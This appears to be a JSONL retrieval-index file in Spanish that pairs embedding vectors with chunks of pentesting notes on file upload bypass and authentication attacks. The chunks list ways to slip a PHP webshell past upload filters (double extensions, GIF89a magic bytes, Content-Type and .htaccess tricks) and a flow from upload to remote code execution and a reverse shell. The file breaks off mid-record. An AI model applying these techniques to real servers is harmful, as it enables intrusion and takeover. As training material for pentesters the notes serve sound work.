-0.04466, -0.05849, -0.07776, 0.04433, 0.03058, -0.04394, 0.02712, 0.00444, 0.0522, -0.07599, 0.0022, -0.05118, -0.01137, -0.00521, -0.01292, 0.0372, -0.09337, 0.12131, -0.15722, -0.05973, 0.02153, -0.11999, 0.02789, -0.02175, 0.17472, -0.05289, 0.00187, -0.08897, -5e-05, 0.03499, 0.00785, 0.00237, -0.00188, -0.05728, 0.03429, -0.01579, -0.06985, 0.11293, 0.05995, 0.06578, 0.01225, 0.01956, 0.023, -0.06443, -0.00839, 0.01826, 0.03293, -0.08346, 0.00436, 0.0662, -0.02096, 0.00845, -0.02344, -0.06, -0.03386, -0.0616, 0.00773, 0.01582, -0.00202, 0.02098, 0.01531, 0.04041, -0.02944, -0.05439, -0.11499, 0.11346, -0.05255, -0.01651, -0.00335, 0.00117, 0.0301, -0.0659, 0.05123, -0.01496, 0.05292, 0.08056, -0.02152, -0.00229, 0.04692, 0.01055, -0.03912, 0.01272, -0.11393, -0.04909, -0.01564, -0.03282, 0.01451, 0.14551, -0.0106, 0.00727, 0.01637, -0.09926, -0.01281, 0.13646, -0.11639, 0.04607, -0.02047, 0.03131, -0.02501, 0.02575, -0.03986, 0.00994, 0.02201, -0.06014, -0.07863, 0.06587, 0.05765, -0.03265, 0.05713, -0.12852, -0.02478, -0.02054, 0.02071, -0.01698, -0.00742, 0.01224, 0.04022, -0.03506, -0.05668, 0.00398, 0.02062, -0.01708, 0.04129, 0.07719, -0.0135, 0.05701, -0.03649, 0.03115, -0.01018, -0.06052, -0.06912, 0.06327, -0.00532, -0.02181, -0.00352, -0.0221, -0.00214, -0.06628, 0.00737, 0.02295, 0.02525, 0.03289, 0.01483, 0.08206, 0.01906, -0.07395, 0.05879, -0.07106, -0.02979, 0.0088, 0.0632, 0.02156, -0.06929, 0.00461, -0.00796, 0.02282, 0.07144, 0.03828, 0.01553, -0.00106, 0.00094, -0.01943, 0.01678, 0.01892, -0.0401, 0.00988, -0.04668, 0.01368, 0.03765, 0.02895, 0.04791, -0.03085, -0.15204, -0.03327, 0.02007, 0.05113, 0.03065, -0.08917, -0.00183, -0.0863, -0.06007, -0.00733, -0.01683, -0.05423, -0.05705, 0.02606, -0.00898, -0.0683, 0.04521, -0.05598]} +{"tipo": "pregunta", "herramienta": "File upload bypass", "perfil": "PENTESTERS", "fichero": "conocimiento/02 - Explotacion web/File upload bypass.md", "tema": "explotacion web", "fuente": null, "licencia": null, "texto": "# File upload bypass\n\n> Subir una webshell cuando el upload estΓ‘ \"filtrado\". Vector de Hacking web. Manipula la subida con Burp Suite.", "indexar": "cual es un vector de hacking para subir exploits a travΓ©s del upload", "v": [0.11512, 0.02546, -0.18216, -0.06717, 0.04268, -0.10963, -0.0565, -0.00753, 0.08583, -0.0658, -0.07743, -0.12484, -0.09645, 0.042, -0.0304, -0.04772, 0.05272, -0.12817, 0.05636, 0.05765, 0.04866, 0.1612, 0.00854, -0.10627, -0.05672, -0.02777, -0.01017, 0.11048, -0.1812, -0.13658, 0.02062, -0.001, -0.10197, 0.06239, -0.0643, -0.04346, 0.01266, 0.05005, 0.11867, 0.04234, 0.01942, 0.01492, -0.18965, -0.04892, -0.00773, -0.01906, -0.0588, -0.09712, 0.05302, -0.04324, 0.07504, -0.00248, -0.19326, -0.07036, -0.03987, -0.05371, 0.05626, -0.06755, 0.02081, -0.07231, -0.00699, 0.0622, 0.02281, -0.05918, -0.04362, -0.10679, -0.07917, 0.00939, -0.16965, 0.13041, 0.06997, 0.08677, 0.027, 0.05705, 0.03516, -0.0269, 0.03404, -0.03166, -0.03594, -0.00611, -0.06744, -0.06326, -0.01303, 0.07828, -0.17575, -0.03049, 0.05546, -0.05736, 0.01455, 0.00124, 0.07329, 0.04334, 0.00675, -0.10265, 0.00265, -0.14247, 0.11349, -0.06513, -0.00124, -0.01352, -0.02961, -0.10204, -0.02017, 0.13444, 0.01227, 0.06914, -0.00286, -0.04176, 0.00256, -0.07109, 0.05488, 0.03698, -0.04729, -0.02489, -0.03103, -0.08873, -0.0439, -0.04721, -0.02828, -0.087, -0.09613, -0.05091, 0.0312, 0.03485, 0.06714, -0.03834, -0.04298, 0.06026, -0.00344, -0.06654, 0.00602, 0.0236, 0.01137, 0.0067, -0.03454, -0.06893, -0.00934, -0.10418, -0.01022, -0.06747, 0.01885, 0.1239, -0.0068, -0.04645, 0.00871, 0.03485, -0.01292, -0.04439, -0.08415, -0.07379, -0.02736, 0.04351, -0.03438, 0.04221, -0.04073, 0.04119, -0.0266, -0.12078, -0.02659, 0.06973, 0.07135, -0.00064, 0.03202, -0.02433, -0.09406, 0.06503, 0.0129, -0.05726, 0.00519, 0.01298, -0.02174, 0.06692, 0.01147, -0.07796, 0.05822, -0.10085, -0.07541, -0.05908, 0.01451, -0.01691, -0.02137, 0.00455, 0.08128, 0.0465, -0.098, -0.07114, 0.06546, -0.01097, 0.01018, 0.00767, 0.00839, -0.06481, -0.07448, 0.09629, 0.01332, -0.04348, -0.06336, -0.00755, 0.06755, -0.03622, -0.03661, -0.01952, -0.03121, -0.01637, -0.00092, -0.00719, 0.03974, -0.08167, -0.08187, 0.04705, 0.04756, 4e-05, 0.01147, -0.06085, -0.01654, 0.00983, 0.02868, 0.01812, -0.077, -0.02095, 0.00584, 0.05319, 0.05359, -0.01407, -0.04766, 0.0292, 0.00617, 0.0397, -0.0133, 0.00641, -0.02283, 0.0222, 0.01057, -0.03474, -0.00538, 0.0128, 0.03814, 0.00395, -0.07205, -0.0699, -0.00295, 0.05346, 0.02233, -0.07666, -0.05814, -0.02999, -0.06483, 0.01813, -0.00867, -0.03517, -0.01781, 0.01066, 0.01038, -0.02437, 0.02771, -0.0277]} +{"tipo": "pregunta", "herramienta": "File upload bypass", "perfil": "PENTESTERS", "fichero": "conocimiento/02 - Explotacion web/File upload bypass.md", "tema": "explotacion web", "fuente": null, "licencia": null, "texto": "## Trucos\n```\nDoble extensiΓ³n β†’ shell.php.jpg, shell.phtml, .phar, .pht\nMagic bytes β†’ GIF89a;\nContent-Type β†’ Burp: cambiar a image/jpeg\n.htaccess β†’ reasignar el handler para que .jpg se ejecute como PHP\n```", "indexar": "ΒΏcΓ³mo puedo ejecutar cΓ³digo PHP oculto en una imagen?", "v": [-0.04261, 0.01028, 0.06616, -0.03921, 0.00895, -0.25924, 0.05648, 0.01931, -0.03698, -0.1945, -0.09468, -0.03615, 0.02346, -0.04558, -0.01828, -0.08126, 0.10168, -0.01239, 0.04259, -0.09784, -0.01497, -0.05728, -0.12906, -0.14232, -0.01798, -0.01784, -0.00889, 0.16215, -0.10763, -0.17659, 0.03096, 0.0127, 0.09601, 0.0883, -0.10544, 0.14119, 0.08991, -0.04124, -0.06349, 0.13033, -0.04225, 0.10223, -0.03691, 0.08383, 0.00453, 0.03741, 0.02253, 0.01929, 0.08235, -0.03693, 0.01761, -0.06973, -0.15186, -0.02068, 0.03332, -0.0183, 0.07551, -0.08872, 0.0051, 0.0732, 0.08369, -0.07931, 0.04827, -0.03326, 0.0174, 0.03887, 0.05241, 0.07533, -0.00401, 0.09788, -0.02318, 0.07712, -0.10275, 0.02162, 0.05525, -0.01853, -0.01222, -0.19231, -0.07932, 0.06079, -0.02473, 0.00032, -0.05613, 0.01802, -0.07915, -0.11692, -0.10357, -0.00794, -0.04032, -0.08738, 0.15249, 0.08896, -0.00367, 0.02957, -0.03032, 0.07794, 0.031, -0.01777, -0.06095, 0.00565, -0.0214, -0.02669, -0.01648, -0.02462, 0.19097, 0.05684, 0.09174, 0.00884, -0.04619, -0.05985, 0.01689, -0.06697, -0.15223, -0.00731, -0.0284, 0.02503, 0.07475, 0.04176, -0.01079, -0.08228, -0.10126, 0.00413, -0.09931, 0.03888, 0.09089, 0.01556, 0.0568, 0.07689, -0.08271, -0.06355, -0.14435, -0.05178, 0.0248, -0.02127, -0.04268, 0.11593, 0.11224, 0.00365, 0.00594, 0.01954, -0.02974, -0.07177, -0.00772, 0.08219, -0.00151, 0.03918, 0.03274, -0.04424, -0.0421, 0.01169, 0.06372, 0.01729, 0.01006, -0.02575, -0.05961, -0.0029, 0.01452, -0.00159, -0.05823, -0.0043, -0.04523, 0.0514, 0.04436, -0.00199, -0.01613, -0.03195, -0.06008, -0.03282, 0.01967, -0.00239, 0.06111, -0.00326, 0.01603, -0.06673, 0.06618, 0.00524, -0.00697, -0.04227, -0.02476, 0.0369, 0.06175, 0.08998, 0.07603, -0.00424, 0.0508, 0.05268, 0.04572, 0.01526, -0.04102, -0.02367, 0.00225, -0.03109, 0.03727, -0.00656, 0.0403, 0.00102, 0.0369, 0.00259, -0.00098, -0.03241, -0.04706, 0.01908, 0.06396, 0.00027, 0.01383, -0.03852, -0.00019, 0.06265, -0.04154, 0.00721, -0.00614, -0.01242, 0.06445, -0.04802, 0.01379, 0.01154, -0.07458, 0.06712, 0.03988, -0.01949, -0.06518, 0.03638, 0.04443, -0.02376, 0.05785, -0.02327, -0.06419, 0.03503, -0.03271, 0.00564, -0.00254, 0.02252, -0.05824, 0.02074, 0.0407, 0.00317, -0.07554, -0.00328, -0.03347, -0.03245, 0.05799, 0.0491, -0.01182, -0.00722, 0.02573, -0.03072, -0.02955, -0.03547, -0.03243, -0.01282, -0.03009, -0.01437, 0.02391, -0.02074, -0.02062, 0.02099]} +{"tipo": "pregunta", "herramienta": "File upload bypass", "perfil": "PENTESTERS", "fichero": "conocimiento/02 - Explotacion web/File upload bypass.md", "tema": "explotacion web", "fuente": null, "licencia": null, "texto": "## Trucos\n```\nDoble extensiΓ³n β†’ shell.php.jpg, shell.phtml, .phar, .pht\nMagic bytes β†’ GIF89a;\nContent-Type β†’ Burp: cambiar a image/jpeg\n.htaccess β†’ reasignar el handler para que .jpg se ejecute como PHP\n```", "indexar": "quΓ© tΓ©cnica sirve para servir archivos con extensiones extraΓ±as usando PHP?", "v": [0.06416, 0.058, -0.11657, -0.15406, 0.01858, -0.08098, 0.04469, -0.11651, 0.04512, -0.04351, -0.19569, 0.0245, -0.06942, -0.07115, 0.03218, -0.13973, 0.10193, -0.08538, 0.2041, -0.01664, -0.09756, 0.0298, -0.19617, -0.17065, -0.09728, -0.02576, -0.03232, 0.00733, -0.16374, -0.03189, 0.06371, 0.13064, -0.01129, 0.0648, -0.10378, 0.05978, 0.02776, 0.00709, -0.11883, 0.08153, 0.04798, -0.00849, -0.13716, 0.01283, -0.01011, 0.01351, 0.02133, 0.03027, 0.05719, 0.0793, -0.01329, 0.03367, -0.11647, 0.05627, 0.03834, -0.05309, 0.00109, -0.24841, -0.07062, 0.12086, -0.03265, -0.01998, 0.02016, -0.00876, 0.11442, -0.0305, -0.04538, -0.01704, -0.05236, 0.04813, -0.12053, 0.1025, 0.02246, -0.01505, -0.06056, 0.08786, 0.03909, -0.05519, 0.01266, -0.01692, -0.02868, -0.00265, -0.07869, -0.03365, -0.07969, -0.0368, 0.00319, 0.01486, 0.00448, -0.1089, 0.22543, 0.0961, -0.03941, -0.0546, -0.02354, 0.01268, 0.07887, -0.05546, 0.02614, -0.03523, 0.05474, -0.00708, 0.04538, 0.09793, 0.06515, 0.02009, 0.12012, -0.04498, -0.04786, -0.09408, -0.02646, 0.05789, -0.02068, 0.00371, -0.06497, -0.07777, 0.04164, -0.03509, -0.07704, 0.01557, -0.01498, 0.00747, 0.01573, 0.0765, 0.01769, -0.13509, -0.01154, 0.08981, -0.02484, -0.01101, -0.01099, -0.10701, -0.04577, -0.03219, -0.01513, 0.06025, 0.17279, 0.05011, -0.07863, -0.00875, -0.00035, -0.01171, -0.03232, 0.07978, 0.02547, -0.00209, 0.06036, -0.02152, -0.04344, -0.09998, 0.01558, -0.08566, 0.03094, 0.03128, -0.10224, -0.02474, -0.00766, -0.05781, -0.07275, 0.09226, 0.00536, 0.03536, 0.03195, 0.00652, -0.03632, -0.0493, -0.0258, -0.0001, 0.08475, -0.02262, 0.04751, -0.01242, -0.00702, -0.05989, 0.04417, 0.03447, -0.05018, 0.01807, 0.00661, -0.00306, -0.00724, -0.02423, 0.028, -0.01751, -0.00207, -0.01818, 0.00096, -0.01635, -0.0046, 0.00626, -0.07129, -0.01606, -0.02444, -0.01773, -0.03861, -0.00221, -0.0262, -0.07196, -0.01148, -0.02554, -0.03176, 0.04596, 0.01393, 0.02093, 0.06359, -0.01054, -0.00205, -0.01397, -0.03518, 0.01709, 0.0184, -0.02123, 0.02902, 0.01147, 0.0238, -0.0236, -0.06513, 0.03658, -0.00961, -0.05569, -0.04354, -0.02007, -0.00474, -0.00345, 0.01831, 0.08701, -0.00835, -0.01413, -0.02804, 0.00342, -0.03141, 0.02661, -0.02686, -0.01662, 0.00709, -0.02256, -0.01851, 0.03254, -0.00443, -0.03948, -0.01705, 0.06784, -0.0225, 0.00653, -0.02989, -0.0261, -0.02635, 0.0199, -0.01052, -0.00933, -0.00403, -0.00301, 0.00382, 0.01685, 0.00663, 0.0208]} +{"tipo": "pregunta", "herramienta": "File upload bypass", "perfil": "PENTESTERS", "fichero": "conocimiento/02 - Explotacion web/File upload bypass.md", "tema": "explotacion web", "fuente": null, "licencia": null, "texto": "## Trucos\n```\nDoble extensiΓ³n β†’ shell.php.jpg, shell.phtml, .phar, .pht\nMagic bytes β†’ GIF89a;\nContent-Type β†’ Burp: cambiar a image/jpeg\n.htaccess β†’ reasignar el handler para que .jpg se ejecute como PHP\n```", "indexar": "con quΓ© mΓ©todo puedo hacer que un archivo de imagen se ejecute como script?", "v": [-0.06514, 0.09252, -0.07819, -0.13626, -0.04674, -0.10978, -0.00246, 0.02027, -0.07279, -0.11689, -0.08226, 0.00264, 0.03997, -0.03162, 0.09001, -0.00236, 0.24267, -0.02243, 0.06554, -0.09998, 0.01281, -0.04786, -0.08409, -0.05076, -0.06477, -0.00482, 0.00904, 0.15893, -0.12251, -0.04871, -0.07297, 0.12337, 0.09282, -0.03352, -0.06988, 0.05373, 0.11007, -0.00694, -0.1747, 0.14181, -0.07154, -0.02872, -0.1738, 0.09089, -0.10187, -0.0621, 0.04969, -0.01096, 0.00346, -0.007, 0.11364, -0.06625, -0.06716, 0.01513, -0.05361, -0.04534, 0.05, -0.17291, -0.01231, 0.07298, 0.01415, 0.03441, 0.00506, 0.06838, 0.04352, 0.02463, 0.00919, -0.00646, -0.06427, 0.00833, -0.0054, 0.04975, -0.02436, 0.01265, -0.02606, -0.00045, -0.10977, -0.10381, -0.09912, -0.03797, -0.04911, -0.05838, -0.05788, 0.0149, -0.14542, -0.09098, -0.07461, -0.00875, 0.02716, -0.16351, 0.06675, -0.03147, 0.01743, 0.0613, 0.05351, -0.04867, 0.01239, 0.00938, 0.02545, 0.02107, 0.01549, -0.02386, -0.08689, 0.08171, 0.12917, 0.04748, 0.03651, 0.04979, -0.08085, -0.08347, 0.03599, 0.02869, 0.01312, 0.07426, -0.15056, -0.03638, -0.05275, -0.02166, -0.03871, -0.00871, -0.03099, 0.02603, -0.06314, 0.01101, 0.03238, -0.11634, -0.00079, 0.09724, -0.11752, 0.00338, -0.11672, 0.04349, -0.04052, -0.047, -0.05088, 0.06013, 0.12456, -0.03173, -0.03783, -0.08287, 0.08006, 0.02417, 0.02621, -0.02158, 0.04442, -0.06143, 0.00184, -0.13546, -0.07196, -0.07687, 0.03382, -0.00988, -0.00032, 0.04813, 0.00751, -0.03056, 0.08294, -0.07884, -0.01756, 0.04356, -0.0485, 0.03525, -0.00743, 0.09163, 0.00233, -0.06712, -0.0341, -0.00672, -0.06218, -0.01564, 0.00161, 0.01528, -0.03542, -0.09511, 0.06051, 0.0064, -0.00189, -0.10321, 0.01197, 0.00862, 0.011, 0.04636, 0.04064, 0.03255, 0.03162, -0.0355, 0.03944, 0.00957, -0.0179, 0.07992, -0.02673, 0.04332, -0.03606, -0.01582, -0.00841, 0.03289, -0.00334, 0.04316, 0.03071, 0.04936, -0.03368, -0.03811, 0.05226, -0.00592, 0.00472, -0.04813, -0.0953, 0.02528, -0.04086, -0.01294, 0.0439, 0.00359, 0.06709, -0.05343, -0.00365, 0.03041, -0.02381, 0.00618, -0.02312, 0.0006, 0.01634, 0.0662, 0.05433, 0.01844, -0.0269, 0.01565, 0.02267, 0.0435, -0.05447, -0.03573, 0.00538, 0.05758, -0.05004, 0.01428, 0.06455, 0.01844, -0.02173, -0.06829, -0.03682, -0.08674, 0.0323, 0.0297, -0.04639, 0.00062, -0.02892, -0.01038, -0.04426, 0.03924, 0.04683, -0.07795, -0.00234, -0.02045, 0.05808, 0.01181, 0.01165, -0.05402]} +{"tipo": "pregunta", "herramienta": "File upload bypass", "perfil": "PENTESTERS", "fichero": "conocimiento/02 - Explotacion web/File upload bypass.md", "tema": "explotacion web", "fuente": null, "licencia": null, "texto": "## Flujo\n1. Subes la webshell evadiendo el filtro.\n2. La localizas (fuzzing de `/uploads/` β†’ EnumeraciΓ³n web).\n3. `?c=...` β†’ RCE β†’ lanzas Reverse shell.", "indexar": "ΒΏquΓ© herramienta sirve para encontrar archivos ocultos en las subcarpetas de una web?", "v": [0.01002, -0.10291, -0.03472, -0.11049, 0.00796, -0.20289, -0.06385, -0.02971, 0.10248, -0.09232, -0.16874, -0.10164, -0.01815, -0.06188, 0.03102, 0.04091, 0.06538, -0.15437, 0.13844, -0.00389, -0.04648, 0.03866, -0.05554, -0.05958, -0.17198, -0.04455, 0.09273, 0.10293, -0.23296, 0.0554, -0.04419, 0.0715, -0.02903, 0.0156, -0.16101, 0.00699, 0.03862, -0.00767, -0.0051, 0.03773, 0.02676, 0.04171, -0.07888, 0.0937, 0.01078, 0.0068, -0.07144, 0.03855, -0.01645, 0.09991, -0.0525, -0.16029, -0.12452, 0.02604, -0.04767, -0.13136, 0.07765, -0.09811, 0.06337, -0.03405, -0.06897, 0.00995, -0.02629, -0.04695, -0.03177, -0.09163, -0.01823, 0.02961, -0.10273, 0.05322, 0.05052, 0.04387, 0.162, 0.01844, 0.01759, 0.04143, -0.02578, -0.0179, -0.0307, -0.00904, 0.11381, 0.02231, -0.0553, 0.04562, -0.00127, -0.05918, 0.01358, 0.03316, -0.02426, -0.1266, -0.01955, 0.11185, -0.02693, 0.00416, -0.03462, -0.02565, 0.04641, -0.08189, -0.01588, -0.08819, 0.08045, -0.0748, -0.12061, 0.05914, 0.01742, 0.07263, -0.07103, 0.04138, -0.08673, 0.00301, 0.15434, 0.0378, -0.00328, 0.13271, -0.01275, 0.08586, 0.07546, -0.02173, 0.00019, -0.05642, 0.01729, 0.07796, -0.08433, 0.00786, 0.00287, -0.0136, -0.01878, 0.07928, -0.05584, -0.01675, 0.02581, -0.06415, -0.11926, 0.03746, -0.08027, -0.01693, 0.05708, -0.03319, -0.0131, 0.00507, 0.09622, -0.07182, -0.10919, -0.02657, 0.05096, 0.00038, 0.10337, 0.00158, 0.01028, -0.09775, -0.04893, -0.02623, 0.05323, -0.03834, 0.00961, 0.04131, -0.04351, -0.03776, -0.10309, -0.03538, -0.08519, -0.03306, -0.01629, 0.01448, -0.03704, -0.04424, -0.00339, 0.02051, 0.01651, -0.01276, 0.11967, 0.02307, 0.05734, -0.09034, -0.03755, 0.0162, 0.01084, -0.07167, 0.03595, -0.03989, 0.02093, -0.02848, 0.03455, 0.08196, 0.04161, -0.04894, 0.10939, -0.05014, -0.09016, 0.02412, -0.00474, -0.07038, -0.04365, -0.01369, -0.03032, 0.0203, 0.00962, -0.03296, 0.02097, -0.03971, -0.00794, -0.06549, -0.04163, 0.00522, -0.02199, 0.0104, -0.00227, -0.05523, 0.01004, -0.01032, 0.00653, 0.0176, 0.06568, -0.06586, 0.04568, -0.03954, -0.04369, 0.05094, -0.02272, -0.0262, 0.02034, -0.03174, 0.02512, 0.00107, 0.01893, 0.03888, -0.01633, -0.01586, -0.01445, -0.03947, -0.00171, -0.04584, -0.01865, 0.03808, 0.00392, -0.08847, -0.01616, 0.01133, -0.03915, 0.03701, -0.03068, 0.02698, 0.07262, 0.0084, 0.01173, -0.06012, 0.0287, -0.03053, 0.00665, -0.02621, -0.03198, -0.00699, 0.00051, 0.01613, 0.02396, 0.04572]} +{"tipo": "pregunta", "herramienta": "File upload bypass", "perfil": "PENTESTERS", "fichero": "conocimiento/02 - Explotacion web/File upload bypass.md", "tema": "explotacion web", "fuente": null, "licencia": null, "texto": "## Flujo\n1. Subes la webshell evadiendo el filtro.\n2. La localizas (fuzzing de `/uploads/` β†’ EnumeraciΓ³n web).\n3. `?c=...` β†’ RCE β†’ lanzas Reverse shell.", "indexar": "con quΓ© puedo hacer fuzzing sobre la carpeta uploads?", "v": [0.15685, 0.03854, -0.20612, 0.08385, 0.02496, -0.03659, 0.02775, 0.1213, -0.08722, -0.10936, -0.19099, 0.00233, -0.15561, 0.1382, -0.02117, 0.00112, 0.02052, 0.06751, -0.01917, -0.07777, 0.0477, -0.07745, -0.04694, -0.10194, -0.17772, 0.03569, 0.1652, 0.09335, -0.06327, -0.12262, 0.024, 0.10436, -0.00142, 0.08335, 0.00522, 0.07172, 0.02812, -0.00954, -0.09797, -0.01546, -0.01186, 0.19836, -0.07651, 0.05066, 0.00689, -0.04642, -0.02915, -0.1666, -0.06685, 0.03096, -0.02027, -0.06506, 0.06513, -0.05728, 0.00027, -0.11943, -0.07227, -0.2285, 0.11069, 0.04947, 0.06825, -0.00403, -0.0591, 0.05728, -0.05827, -0.02534, 0.02622, -0.0833, 0.0249, 0.12992, 0.07734, 0.00174, 0.07043, -0.11285, -0.06825, 0.08476, -0.04422, -0.13872, -0.09534, -0.02513, 0.03534, 0.0234, 0.00812, -0.04855, 0.03582, -0.07026, -0.04862, -0.08478, -0.05008, -0.04483, 9e-05, 0.07857, -0.11195, -0.07067, 0.05774, 0.05039, 0.00534, -0.02065, -0.03575, -0.03327, -0.05192, 0.02521, -0.12881, 0.07653, -0.00267, 0.0069, 0.00905, -0.05815, -0.0089, -0.11762, 0.06439, 0.08756, -0.00253, -0.00723, -0.0646, -0.13055, -0.03341, -0.02237, -0.08116, 0.05583, -0.00638, -0.02559, 0.00763, 0.02016, 0.08409, -0.05006, 0.04331, 0.08941, -0.05096, 0.06175, -0.02903, 0.03827, -0.05974, -0.04907, 0.01346, 0.0103, -0.03749, -0.03003, 0.04227, -0.03856, 0.0193, 0.03997, 0.02604, -0.02072, -0.01377, -0.02972, -0.00766, -0.05923, -0.0201, -0.04641, 0.0285, 0.01253, 0.02563, -0.00955, 0.0402, -0.06941, 0.09229, -0.07194, -0.05785, -0.03602, -0.01, -0.0212, -0.02142, 0.04319, 0.04045, 0.04577, -0.01851, 0.0396, -0.02161, 0.06988, 0.00744, -0.0233, -0.03504, -0.00377, 0.03632, 0.00118, -0.03045, -0.07438, 0.02958, -0.03329, 0.00862, 0.01873, -0.00037, 0.06124, 0.03011, -0.04575, 0.07206, 0.00788, -0.00674, 0.02625, 0.01758, 0.07514, -0.00028, 0.07308, -0.1029, -0.04281, 0.03119, -0.03639, -0.05818, -0.01087, -0.06822, -0.05843, 0.01521, -0.05289, 0.0543, 0.04865, -0.06486, 0.02849, -0.03128, 0.03725, 0.01264, 0.02133, 0.05439, -0.03645, 0.01301, 0.03889, -0.01513, 0.02676, 0.02411, -0.05651, 0.07427, 0.04933, 0.05784, -0.05666, -0.01868, 0.0365, 0.03081, 0.01054, 0.01694, 0.01149, 0.03221, 9e-05, 0.00648, -0.01144, -0.00658, -0.00475, 0.00126, -0.02338, -0.0288, 0.01318, -0.02192, 0.06705, 0.00407, -0.01442, 0.03097, -0.01868, -0.05386, 0.00651, -0.02387, -0.06434, 0.01526, 0.02686, -0.02163, 0.02947, 0.0047, 0.01442]} +{"tipo": "pregunta", "herramienta": "File upload bypass", "perfil": "PENTESTERS", "fichero": "conocimiento/02 - Explotacion web/File upload bypass.md", "tema": "explotacion web", "fuente": null, "licencia": null, "texto": "## Flujo\n1. Subes la webshell evadiendo el filtro.\n2. La localizas (fuzzing de `/uploads/` β†’ EnumeraciΓ³n web).\n3. `?c=...` β†’ RCE β†’ lanzas Reverse shell.", "indexar": "que tΓ©cnica usamos para localizar una webshell antes de ejecutar un reverse shell?", "v": [0.16939, -0.08333, -0.18055, -0.06077, 0.0452, -0.03961, -0.13416, -0.07364, 0.09321, 0.0215, -0.21314, -0.01091, -0.00654, -0.00402, 0.07833, -0.02573, -0.01889, -0.12829, 0.03739, -0.03386, -0.0644, -0.0511, -0.14563, -0.02002, -0.06877, 0.04157, 0.01184, -0.03643, -0.13628, -0.08161, -0.0971, -0.01153, 0.04802, -0.0373, -0.05219, 0.09718, 0.02305, -0.06289, 0.02729, 0.13663, -0.05529, 0.00773, -0.1583, 0.12887, 0.12558, 0.01858, 0.09724, -0.10116, -0.04364, 0.0062, -0.00606, -0.01446, -0.23385, 0.07005, 0.03839, -0.04501, 0.23316, -0.13685, -0.03197, -0.07465, -0.10371, -0.01919, 0.02468, 0.08243, 0.13402, -0.01912, -0.11653, -0.07888, -0.06943, -0.00496, 0.02251, 0.02572, 0.08624, 0.04769, -0.05175, -0.02964, 0.0485, 0.07361, 0.06839, -0.02917, -0.07469, -0.09939, -0.07597, 0.07062, -0.08019, -0.04677, 0.00633, -0.06274, 0.01462, -0.10519, 0.05243, 0.04667, -0.00371, 0.03179, -0.00273, -0.05221, 0.01903, 0.0289, -0.09488, 0.07802, 0.03666, -0.08212, 0.01901, 0.07708, 0.10541, 0.07586, -0.05373, 0.01265, -0.01102, 0.03275, -0.0472, -0.02335, -0.02464, -0.01751, -0.07738, -0.01258, -0.01086, -0.08763, 0.05583, -0.07492, -0.02986, 0.01815, -0.04254, -0.00805, -0.05448, -0.01981, -0.0389, 0.02367, -0.04127, -0.04276, 0.00189, -0.01164, -0.05063, 0.04729, -0.02809, 0.15138, 0.07754, 0.00479, 0.04038, -0.07288, 0.00767, 0.05146, -0.1239, 0.06979, 0.05184, -0.03298, 0.08159, -0.03889, -0.12838, -0.03311, 0.03803, 0.00936, -0.05136, 0.01268, -0.04013, -0.07653, -0.00582, -0.03572, -0.00207, -0.01507, -0.00643, 0.0184, 0.01343, 0.00536, -0.00867, -0.032, -0.11782, 0.00738, 0.01146, 0.02794, 0.01445, 0.07267, -0.0253, 0.00052, 0.05724, 0.05047, -0.05242, -0.02196, 0.03129, -0.04107, 0.05446, -0.06415, 0.02434, -0.07189, -0.01371, 0.03286, 0.01383, 0.05742, -0.03492, 0.07214, -0.00581, 0.00902, -0.01162, -0.0079, -0.02519, 0.03208, 0.0425, -0.05825, 0.01295, -0.02502, 0.00379, 0.01723, 0.02133, -0.05344, -0.01597, 0.00882, -0.04302, -0.04499, -0.08022, 0.00077, -0.04544, -0.00745, 0.03787, 0.05011, 0.01217, -0.04127, 0.00624, 0.01765, -0.04911, 0.02782, -0.00787, 0.02654, 0.02877, 0.00614, -0.00827, -0.08799, 0.02994, 0.00455, -0.02412, -0.02958, -0.04869, 0.03787, 0.04777, -0.00284, -0.01291, 0.01229, 0.01445, -0.04192, -0.00223, -0.03987, 0.02018, 0.07058, -0.04581, -0.01946, 0.00723, -0.02387, -0.08569, -0.02206, -0.02179, -0.03573, 0.03227, 0.03256, 0.0148, -0.03336, 0.01373, -0.05016]} +{"tipo": "pregunta", "herramienta": "Authentication attacks", "perfil": "PENTESTERS", "fichero": "conocimiento/02 - Explotacion web/Authentication attacks.md", "tema": "explotacion web", "fuente": null, "licencia": null, "texto": "# Authentication attacks\n\n> Romper logins web: credenciales por defecto, fuerza bruta y bypass. Casi siempre el primer intento en Hacking web.", "indexar": "que herramienta sirve para romper logins web con fuerza bruta?", "v": [0.0489, -0.03739, -0.29453, -0.16578, -0.03654, -0.02104, -0.01735, 0.02754, 0.04067, -0.15095, -0.11133, -0.00518, 0.08575, 0.0491, 0.02975, -0.0827, -0.06044, -0.14135, -0.10965, -0.02661, -0.04002, -0.04799, 0.02867, -0.11495, -0.06744, -0.0818, -0.00319, 0.07312, -0.17077, 0.00197, -0.02411, 0.0376, 0.12489, -0.04549, -0.06399, -0.00377, -0.05431, 0.05644, 0.07695, 0.09777, -0.00027, 0.0851, -0.07059, 0.06545, -0.05821, 0.04199, -0.05254, 0.0167, 0.01982, 0.12864, -0.08162, -0.1109, -0.10712, -0.00604, -0.10516, -0.18885, 0.14373, -0.10113, -0.09912, 0.00746, -0.16732, 0.05894, -0.09743, -0.08346, -0.01454, 0.00114, -0.06618, -0.0834, -0.01517, 0.03865, -0.13634, -0.02985, -0.0209, -0.05825, -0.03603, 0.01201, -0.0019, 0.04274, 0.02272, -0.00573, 0.05184, 0.03724, -0.15635, 0.01058, -0.07678, -0.0679, 0.09803, -0.02587, 0.03552, -0.05651, 0.03786, 0.06745, -0.0313, -0.0276, 0.00883, -0.03099, 0.01529, -0.02393, -0.01687, -0.06217, 0.05359, -0.07841, -0.07515, -0.0806, 0.06163, -0.06417, -0.04906, 0.02675, -0.07412, 0.06502, 0.08418, -0.02184, -0.04751, 0.03788, -0.03719, 0.09812, -0.11673, -0.10245, -0.06237, -0.03113, -0.00501, 0.03405, -0.08111, 0.04749, -0.08403, 0.06789, 0.04158, 0.07422, -0.00191, -0.12713, 0.02693, -0.05789, -0.00735, 0.02501, 0.01678, -0.05311, 0.0586, -0.13528, -0.01095, -0.0917, 0.00536, 0.00796, -0.03229, -0.05811, 0.0741, 0.04607, 0.04989, 0.01084, -0.05062, 0.0015, 0.04404, -0.06905, -0.02122, 0.06823, -0.0992, 0.00203, -0.01286, -0.04283, -0.08371, -0.01526, -0.07915, -0.05626, -0.01594, -0.04015, -0.01127, 0.01046, -0.05291, 0.00153, 0.06964, 0.04299, 0.03225, 0.01256, 0.10263, 0.02332, 0.02244, -0.03843, -0.05142, 0.04847, -0.06274, -0.01853, 0.00501, -0.01156, -0.01782, 0.00758, -0.02495, -0.0165, 0.02492, -0.03765, -0.00367, 0.02479, 